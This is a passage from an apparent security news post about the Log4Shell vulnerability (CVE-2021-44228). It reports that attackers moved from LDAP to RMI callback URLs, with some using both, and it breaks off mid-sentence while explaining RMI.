These past few days have been about the most important vulnerability discovered lately. The vulnerability, officially tagged as CVE-2021-44228 and called Log4Shell or LogJam, is an unauthenticated RCE vulnerability that allows total system takeover on systems running Log4j 2.0-beta9 through 2.14.1.
What Is Happening?
As reported by BleepingComputer, in order to increase their chances of success, some threat actors leveraging the Apache Log4j vulnerability have shifted from LDAP callback URLs to RMI, or even utilized both in a single request.
This move is a significant advance in the continuing attack, and companies must be aware of it when attempting to secure all potential channels. For the time being, this pattern has been detected by threat actors trying to hijack resources for Monero mining, but others may follow suit at any time.
The LDAP (Lightweight Directory Access Protocol) service has been used in the majority of attacks targeting the Log4j “Log4Shell” vulnerability.
At first, glance, switching to RMI (Remote Method Invocation) API appears counter-intuitive, given that this technique is subject to extra checks and limitations, but this is not always the case, but if we take into account that some JVM (Java Virtual Machine) versions may not have strict rules, RMI might be